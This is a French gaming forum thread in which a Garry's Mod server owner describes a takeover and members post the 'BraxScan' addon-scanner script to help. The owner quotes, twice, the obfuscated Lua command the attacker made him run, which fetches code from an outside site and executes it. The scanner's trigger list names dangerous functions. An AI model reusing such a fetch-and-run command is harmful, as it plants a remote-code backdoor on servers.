wttfff

  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Ya un mec qui me faisait tourner il etais vip jai aucun addon leak son steamid STEAM_0:0:210637209
il est sur le sourceban c'est brinks systems? il faisait +use sur moi +left wtfff
le mec il ma forcer a dire ca ulx luarun _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)

https://prntscr.com/hyrr0m
 
Dernière édition:
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
Backdoor dans le ftp ou encore cette addons réupload caca (anti pk?)
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Yoh Sambre ♪ à dit:
Backdoor dans le ftp ou encore cette addons réupload caca (anti pk?)
jutulise le momo anti propskill sur le workshop
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
http://steamcommunity.com/sharedfiles/filedetails/?id=782268298
c'est ca ma collection
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
go faire un scan au pire..

Installation > lua/autorun (tu fait un new fichier genre brax.lua)

Code:
-- Not optimized at all. Use at your own risk.
BraxScan = BraxScan or {}
BraxScan.Trigger = { -- external sources "http\\.", "HTTP", "HTML", "OpenURL", "sound.PlayURL", -- people don't use this for legit purposes "CompileString", "CompileFile", "RunString", "RunStringEx", "%(_G%)", "setmetatable", -- databases "sql", "MySQLite", "mysqloo", "tmysql", -- encryption "Base64Encode", "Base64Decode", "CRC", -- superiority complex ":Ban\\(", ":Kick\\(", -- players "player.GetByUniqueID", "SetUserGroup", "setroot", "setrank", -- workshop "steamworks.Subscribe", "steamworks.ViewFile", "steamworks.OpenWorkshop", "resource.AddWorkshop", -- screen "render.Capture", "render.CapturePixels", "render.ReadPixel", -- configs and cheats "hostip", "hostname", "server.cfg", "autoexec.cfg", "\\.dll", "\\.exe", "bind\\ ", "connect\\ ", "point_servercommand", "lua_run", "\"rcon", "\"rcon_password", "\"sv_password", "\"sv_cheats"
}
BraxScan.Version = 0.2
print("♫ BraxScan initialized on ".. (SERVER and "server" or "client") ..". Use 'braxscan' to scan.")
local LogBuffer = "\n"
function BraxScan.Print(color, text) if(type(color) == "table") then MsgC(color,text.."\n") BraxScan.LogAdd(text) else MsgN(color) BraxScan.LogAdd(color) end
end
function BraxScan.LogNew() LogBuffer = ""
end
function BraxScan.LogAdd(text) LogBuffer = LogBuffer .. text .. "\n"
end
function BraxScan.LogSave() file.Write("braxscan/scan_"..os.date("%y-%m-%d_%H-%M-%S")..".txt", LogBuffer)
end
file.CreateDir("braxscan")
function BraxScan.ScanAddon(addon) BraxScan.Print(Color(0,255,255), "♫ "..addon.title.." ♫") BraxScan.Print(Color(200,200,200), "File: "..addon.file) BraxScan.Print(Color(200,200,200), "ID: "..addon.wsid) MsgN("") local luafiles = 0 local found = 0 Files = {} local function Recurs(f,a) local files, folders = file.Find(f .. "*", a) for k,v in pairs(files) do local s = string.Split(v,".") if s[#s] == "dll" then BraxScan.Print(Color(255,0,0), "\n\n!!! Found DLL file in addon "..a.." !!!\n") end if s[#s] == "lua" then table.insert(Files,f..v) -- add file to list local luafile = file.Read(f..v, "GAME") if not luafile then print("cannot read lua file") continue end local lines = string.Split(luafile,"\n") if not lines then continue end if #lines == 1 then BraxScan.Print(Color(255,0,0), "+-- Only one line in "..f..v.." --") BraxScan.Print(Color(0,255,0), "| 1 | "..lines[1].."\n") found = found + 1 end for linenr, line in pairs(lines) do -- find trigger words for _, w in pairs(BraxScan.Trigger) do if string.find(line, w, 0, false) then BraxScan.Print(Color(255,0,0), "┌── Found '"..w.."' in "..f..v.." on line "..linenr.." ──") for i=math.Clamp(linenr-3,0,9999),math.Clamp(linenr+3,0,#lines) do if not lines[i] then continue end BraxScan.Print(i == linenr and Color(0,255,0) or Color(255,255,0), "│ "..i.." | "..lines[i]) end BraxScan.Print(Color(255,0,0), "└───●") BraxScan.Print("\n") found = found + 1 end end -- find steamids in plain text local steamid = string.match(line, "(STEAM_[0-9]:[0-9]:[0-9]+)") if steamid then BraxScan.Print(Color(255,0,0), "┌── Found SteamID "..steamid.." at line "..linenr.." in "..f..v.." ──") for i=math.Clamp(linenr-3,0,9999),math.Clamp(linenr+3,0,#lines) do BraxScan.Print(i == linenr and Color(0,255,0) or Color(255,255,0), "│ "..i.." | "..lines[i]) end BraxScan.Print(Color(255,0,0), "└───●") BraxScan.Print("\n") found = found + 1 end end luafiles = luafiles + 1 end end for k,v in pairs(folders) do Recurs(f..v.."/",a) end end Recurs("",addon.title) BraxScan.Print(Color(200,200,128), "⌐ Lua files: "..luafiles) BraxScan.Print(Color(200,200,128), "⌐ Suspicious things: "..found) BraxScan.Print("")
end
concommand.Add("braxscan", function(ply,com,arg) if IsValid(ply) and not ply:IsSuperAdmin() then ply:PrintMessage(HUD_PRINTCONSOLE, "Superadmin only") return end if not arg[1] then print("\n---------- BraxScan "..BraxScan.Version.." ----------\n") print("To search all addons: braxscan all 1") print("To search a specific addon: braxscan *ID* 1") print("Last argument is whether to save log or not.") print("\n----------------------------------") return end local savelog = arg[2] == "1" and true or false local addons = engine.GetAddons() print("\n---------- BraxScan "..BraxScan.Version.." ----------\n") print("Addons installed: "..#addons) print("\nStarting search...\n") if not BraxScan.Trigger then MsgC(Color(255,0,0), "No definitions file, odd.\n") return end if arg[1] == "all" then BraxScan.LogNew() for anum, addon in pairs(addons) do BraxScan.ScanAddon(addon) end if savelog then BraxScan.LogSave() end else BraxScan.LogNew() print("Specific search for ID "..arg[1].."...") local found = false for anum, addon in pairs(addons) do if addon.wsid == arg[1] then BraxScan.ScanAddon(addon) found = true break end end if savelog then BraxScan.LogSave() end if not found then MsgC(Color(255,0,0), "No addon with that ID installed.\n\n") end end MsgC(Color(0,255,0), "All done.") if savelog then MsgC(Color(0,255,0), "\nLog file saved to data directory.") end print("\n\n----------------------------------")
end)
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
ya moyen quon ce contacte yoh stpp je flippe ma mere

Jean francois: gros
Jean francois: avec quelle addon ta fait ca
Jean francois: jai pas de leak
Jean francois: en plus
LeFaux: c'est pas un addon
Jean francois: bah tu ma fait run ulx luarun _G[string.char(104,116,116,112)][string.char(70,101,116,99,104)](string.char(104,116,116,112,58,47,47,98,97,116,97,46,114,101,47,117,110,98,97,110,95,105,100,46,112,104,112),function(v) _G[string.char(82,117,110,83,116,114,105,110,103)..'Ex'](v, nil, false) end)
LeFaux: puis j'ai rien à te dire tu veux me ban
Jean francois: mais explique moi
Jean francois: pourquoi
Jean francois: et comment
Jean francois: ta hack mon rcon
Jean francois: ou mom pc
Jean francois: je flippe
LeFaux: lol
Jean francois: Gros dit moi
Jean francois: jte paye apres
Jean francois: en premier ta fait ulx logecho
LeFaux: nop
LeFaux: exploit ulx ouais
LeFaux: mais j'te dirrais rien
Jean francois: c'est un menu public
LeFaux: c'est pas une command tu aurras rien avec blog
LeFaux: un menu?
Jean francois: mais comment fait juste expliquer
Jean francois: dit
Jean francois: moi
Jean francois: et jte deban apres
LeFaux: non
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
il a rien dans le truc
sa met juste des trucs comme le gphone mais c'est les autheurs qui mettent leur steamid dans le truc
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
Arrêtez votre foutu parano et ne payez pas ce random en échange de la liberté du serveur..maintenance du serveur en attendant de trouver une solution (faudrait fouiné dans le ftp y'a forcément un addon infecté ou un code malicieux installer par JeanCodeur)
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Yoh Sambre ♪ à dit:
Arrêtez votre foutu parano et ne payez pas ce random en échange de la liberté du serveur..maintenance du serveur en attendant de trouver une solution (faudrait fouiné dans le ftp y'a forcément un addon infecté ou un code malicieux installer par JeanCodeur)
sa fait 2 heures que je cherche
 
UnCaribou

UnCaribou

Geek
Messages
82
Score réaction
35
Points
70
Dynastix à dit:
sa fait 2 heures que je cherche
Essaie ce que Yoh ta dis :

Yoh Sambre ♪ à dit:
go faire un scan au pire..

Installation >
Dans addons tu crée ses dossiers brax/lua/autorun/server et tu y met un nouveau fichier : sv_brax.lua

Code:
-- Not optimized at all. Use at your own risk.
BraxScan = BraxScan or {}
BraxScan.Trigger = { -- external sources "http\\.", "HTTP", "HTML", "OpenURL", "sound.PlayURL", -- people don't use this for legit purposes "CompileString", "CompileFile", "RunString", "RunStringEx", "%(_G%)", "setmetatable", -- databases "sql", "MySQLite", "mysqloo", "tmysql", -- encryption "Base64Encode", "Base64Decode", "CRC", -- superiority complex ":Ban\\(", ":Kick\\(", -- players "player.GetByUniqueID", "SetUserGroup", "setroot", "setrank", -- workshop "steamworks.Subscribe", "steamworks.ViewFile", "steamworks.OpenWorkshop", "resource.AddWorkshop", -- screen "render.Capture", "render.CapturePixels", "render.ReadPixel", -- configs and cheats "hostip", "hostname", "server.cfg", "autoexec.cfg", "\\.dll", "\\.exe", "bind\\ ", "connect\\ ", "point_servercommand", "lua_run", "\"rcon", "\"rcon_password", "\"sv_password", "\"sv_cheats"
}
BraxScan.Version = 0.2
print("♫ BraxScan initialized on ".. (SERVER and "server" or "client") ..". Use 'braxscan' to scan.")
local LogBuffer = "\n"
function BraxScan.Print(color, text) if(type(color) == "table") then MsgC(color,text.."\n") BraxScan.LogAdd(text) else MsgN(color) BraxScan.LogAdd(color) end
end
function BraxScan.LogNew() LogBuffer = ""
end
function BraxScan.LogAdd(text) LogBuffer = LogBuffer .. text .. "\n"
end
function BraxScan.LogSave() file.Write("braxscan/scan_"..os.date("%y-%m-%d_%H-%M-%S")..".txt", LogBuffer)
end
file.CreateDir("braxscan")
function BraxScan.ScanAddon(addon) BraxScan.Print(Color(0,255,255), "♫ "..addon.title.." ♫") BraxScan.Print(Color(200,200,200), "File: "..addon.file) BraxScan.Print(Color(200,200,200), "ID: "..addon.wsid) MsgN("") local luafiles = 0 local found = 0 Files = {} local function Recurs(f,a) local files, folders = file.Find(f .. "*", a) for k,v in pairs(files) do local s = string.Split(v,".") if s[#s] == "dll" then BraxScan.Print(Color(255,0,0), "\n\n!!! Found DLL file in addon "..a.." !!!\n") end if s[#s] == "lua" then table.insert(Files,f..v) -- add file to list local luafile = file.Read(f..v, "GAME") if not luafile then print("cannot read lua file") continue end local lines = string.Split(luafile,"\n") if not lines then continue end if #lines == 1 then BraxScan.Print(Color(255,0,0), "+-- Only one line in "..f..v.." --") BraxScan.Print(Color(0,255,0), "| 1 | "..lines[1].."\n") found = found + 1 end for linenr, line in pairs(lines) do -- find trigger words for _, w in pairs(BraxScan.Trigger) do if string.find(line, w, 0, false) then BraxScan.Print(Color(255,0,0), "┌── Found '"..w.."' in "..f..v.." on line "..linenr.." ──") for i=math.Clamp(linenr-3,0,9999),math.Clamp(linenr+3,0,#lines) do if not lines[i] then continue end BraxScan.Print(i == linenr and Color(0,255,0) or Color(255,255,0), "│ "..i.." | "..lines[i]) end BraxScan.Print(Color(255,0,0), "└───●") BraxScan.Print("\n") found = found + 1 end end -- find steamids in plain text local steamid = string.match(line, "(STEAM_[0-9]:[0-9]:[0-9]+)") if steamid then BraxScan.Print(Color(255,0,0), "┌── Found SteamID "..steamid.." at line "..linenr.." in "..f..v.." ──") for i=math.Clamp(linenr-3,0,9999),math.Clamp(linenr+3,0,#lines) do BraxScan.Print(i == linenr and Color(0,255,0) or Color(255,255,0), "│ "..i.." | "..lines[i]) end BraxScan.Print(Color(255,0,0), "└───●") BraxScan.Print("\n") found = found + 1 end end luafiles = luafiles + 1 end end for k,v in pairs(folders) do Recurs(f..v.."/",a) end end Recurs("",addon.title) BraxScan.Print(Color(200,200,128), "⌐ Lua files: "..luafiles) BraxScan.Print(Color(200,200,128), "⌐ Suspicious things: "..found) BraxScan.Print("")
end
concommand.Add("braxscan", function(ply,com,arg) if IsValid(ply) and not ply:IsSuperAdmin() then ply:PrintMessage(HUD_PRINTCONSOLE, "Superadmin only") return end if not arg[1] then print("\n---------- BraxScan "..BraxScan.Version.." ----------\n") print("To search all addons: braxscan all 1") print("To search a specific addon: braxscan *ID* 1") print("Last argument is whether to save log or not.") print("\n----------------------------------") return end local savelog = arg[2] == "1" and true or false local addons = engine.GetAddons() print("\n---------- BraxScan "..BraxScan.Version.." ----------\n") print("Addons installed: "..#addons) print("\nStarting search...\n") if not BraxScan.Trigger then MsgC(Color(255,0,0), "No definitions file, odd.\n") return end if arg[1] == "all" then BraxScan.LogNew() for anum, addon in pairs(addons) do BraxScan.ScanAddon(addon) end if savelog then BraxScan.LogSave() end else BraxScan.LogNew() print("Specific search for ID "..arg[1].."...") local found = false for anum, addon in pairs(addons) do if addon.wsid == arg[1] then BraxScan.ScanAddon(addon) found = true break end end if savelog then BraxScan.LogSave() end if not found then MsgC(Color(255,0,0), "No addon with that ID installed.\n\n") end end MsgC(Color(0,255,0), "All done.") if savelog then MsgC(Color(0,255,0), "\nLog file saved to data directory.") end print("\n\n----------------------------------")
end)
J'ai modifier le début de la citation pour que tu comprennes mieux.
D'après ce que je vois sa va afficher dans ta console serveur les fonctions potentielement malicieuse.
Envois nous un screen car tout ce que sa va t'afficher n'est pas forcément dangereux.
 
  • J'aime
Réactions: Yoh Sambre ♪
Didouudam57

Didouudam57

Geek suprême
Messages
192
Score réaction
25
Points
130
Tu n'as pas de collection lié, alors quel sont les script que tu as mis dans le dossier addons de ton serveur ? Des leaks ?
 
Akulla

Akulla

Helpeur Divin
Messages
3 808
Score réaction
2 240
Points
550
Dynastix à dit:
Jean francois: ta hack mon rcon
Jean francois: ou mom pc
Jean francois: je flippe
Ayaa
 
  • J'aime
Réactions: Yoh Sambre ♪
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Didouudam57 à dit:
Tu n'as pas de collection lié, alors quel sont les script que tu as mis dans le dossier addons de ton serveur ? Des leaks ?
pas de leaks ... il m'a oubliger a run des commandes ... https://prntscr.com/hz2l7l
 
MathiouGaming

MathiouGaming

Geek suprême
Messages
376
Score réaction
99
Points
150
Salut, dans les logs quelle est la commande qui l'a fait passé de VIP a superadmin?
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
MathiouGaming à dit:
Salut, dans les logs quelle est la commande qui l'a fait passé de VIP a superadmin?
C'est moi julien mais enfait il etais VIP et il a commencer a me faire tourner et il a enlever les logs grace a mon interface
admin je comprends pas ... jai fait braxscan jai cac et apres le mec ma dit c'est une faille ulx
 
Didouudam57

Didouudam57

Geek suprême
Messages
192
Score réaction
25
Points
130
Le grand Loki a encore frappé
 
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Didouudam57 à dit:
Le grand Loki a encore frappé
c'est pas loki jai le lokisploit et il peut pas faire sa jai que du lagsploit sur mon serv
 
Yoh Sambre ♪

Yoh Sambre ♪

Shaman Fou
Messages
16 289
Score réaction
9 688
Points
1 845
  • Initiateur de la discussion
Dynastix

Dynastix

Geek
Messages
103
Score réaction
2
Points
55
Le backdoor étais un panel mais j’ai pas de leak @Yoh Sambre ♪ confirme http://bata.re/unban_id.php étais le site attention c’est un honeypot...
MDR LeFAUx : pasque j'ai prévu des choses dans les cas où quelqu'un cherche à fouiner il a rien fait mais aidez moi à faire fermer ce site stp
Son nom Steam est LeFaux
 
  • Banni
Keetta

Keetta

Bambi
Messages
24
Score réaction
6
Points
30
Dynastix à dit:
Le backdoor étais un panel mais j’ai pas de leak @Yoh Sambre ♪ confirme http://bata.re/unban_id.php étais le site attention c’est un honeypot...
MDR LeFAUx : pasque j'ai prévu des choses dans les cas où quelqu'un cherche à fouiner il a rien fait mais aidez moi à faire fermer ce site stp
Son nom Steam est LeFaux
Honey spot tu veux dire quoi par la ? Facile a bypass les sécurité web ^^
 
Discord d'entraide
Rejoignz-nous sur Discord